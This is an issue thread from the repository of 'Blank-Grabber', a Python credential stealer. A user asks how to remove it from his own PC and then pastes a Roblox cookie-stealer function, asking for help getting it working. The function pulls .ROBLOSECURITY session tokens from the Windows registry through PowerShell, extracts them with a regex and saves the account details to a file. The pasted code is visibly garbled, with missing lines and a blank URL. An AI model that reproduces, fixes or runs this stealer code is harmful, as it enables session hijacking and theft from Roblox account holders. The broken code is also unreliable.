Blank-c / Blank-Grabber

The most powerful stealer written in Python 3 and packed with a lot of features.
MIT License
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I need an answer #174

Closed Fr0go1 closed 1 year ago

Fr0go1 commented 1 year ago

Is it bad that i ran the script on my pc without a VM?

Fr0go1 commented 1 year ago

how do i make it not run on startup?

Fr0go1 commented 1 year ago

now discord doesnt work

Fr0go1 commented 1 year ago

im a idiot

Blank-c commented 1 year ago

not sure what you mean. Can you explain?

Blank-c commented 1 year ago

The script is safe (knowing that you build it). Check the end of the readme to remove the grabber (from startup too).

Fr0go1 commented 1 year ago

ok thanks

Fr0go1 commented 1 year ago

i needed to reinstall discord because it kept popping up with a js error when i tryed to run it

Fr0go1 commented 1 year ago

i also want help with this, i skimmed though the code for a roblox token logger this was the code i found and am trying to get working but it only prints 2,4,3 in that order

`import subprocess import re import os import json

class utils: def robloxStealer(self, cookies= []) -> None: robloxcookies = list() def check(cookie): headers = {'Cookie' : '.ROBLOSECURITY=' + cookie} try: r = json.loads(self.http.request('GET', '', headers= headers).data.decode()) except json.JSONDecodeError: return data = f'Username: {r["UserName"]}\nUserID: {r["UserID"]}\nRobux: {r["RobuxBalance"]}\nBuilders Club Member: {r["IsAnyBuildersClubMember"]}\nPremium: {r["IsPremium"]}\nThumbnail: {r["ThumbnailUrl"]}\n\nCookie: {cookie}' robloxcookies.append(data)

    temp = ['\n'.join(cookies)]
    for i in ('HKCU', 'HKLM'):
        rbxcmd ='powershell Get-ItemPropertyValue -Path {i}:SOFTWARE\\Roblox\\RobloxStudioBrowser\\ -Name .ROBLOSECURITY', capture_output= True, shell= True)
        if not rbxcmd.returncode:
            temp.append(rbxcmd.stdout.decode(errors= 'backslashescape'))
    for i in temp:
        for j in re.findall(r'_\|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items\.\|_[A-Z0-9]+', i):
    if robloxcookies:
        division = '\n\n' + 'Ez Steal'.center(50, '=') + '\n\n'
        filename = "Roblox Cookies.txt"
        file_path = os.path.join(os.getcwd(), filename)
        with open(file_path, 'w', encoding= 'utf-8', errors= 'ignore') as file:
            file.flush()  # make sure that data is written to the file
        file.close()  # close the file properly
        self.collection['Roblox Cookies'] += len(robloxcookies)


instantiate object of class 'utils'

utils_obj = utils()

call the 'robloxStealer' method on the object


Blank-c commented 1 year ago

i also want help with this, i skimmed though the code for a roblox token logger this was the code i found and am trying to get working but it only prints 2,4,3 in that order

`import subprocess import re import os import json

class utils: def robloxStealer(self, cookies= []) -> None: robloxcookies = list() def check(cookie): headers = {'Cookie' : '.ROBLOSECURITY=' + cookie} try: r = json.loads(self.http.request('GET', '', headers= headers).data.decode()) except json.JSONDecodeError: return data = f'Username: {r["UserName"]}\nUserID: {r["UserID"]}\nRobux: {r["RobuxBalance"]}\nBuilders Club Member: {r["IsAnyBuildersClubMember"]}\nPremium: {r["IsPremium"]}\nThumbnail: {r["ThumbnailUrl"]}\n\nCookie: {cookie}' robloxcookies.append(data)

    temp = ['\n'.join(cookies)]
    for i in ('HKCU', 'HKLM'):
        rbxcmd ='powershell Get-ItemPropertyValue -Path {i}:SOFTWARE\\Roblox\\RobloxStudioBrowser\\ -Name .ROBLOSECURITY', capture_output= True, shell= True)
        if not rbxcmd.returncode:
            temp.append(rbxcmd.stdout.decode(errors= 'backslashescape'))
    for i in temp:
        for j in re.findall(r'_\|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items\.\|_[A-Z0-9]+', i):
    if robloxcookies:
        division = '\n\n' + 'Ez Steal'.center(50, '=') + '\n\n'
        filename = "Roblox Cookies.txt"
        file_path = os.path.join(os.getcwd(), filename)
        with open(file_path, 'w', encoding= 'utf-8', errors= 'ignore') as file:
            file.flush()  # make sure that data is written to the file
        file.close()  # close the file properly
        self.collection['Roblox Cookies'] += len(robloxcookies)


instantiate object of class 'utils'

utils_obj = utils()

call the 'robloxStealer' method on the object


I didn't understand what you said and what help you want from me. Please elaborate your question.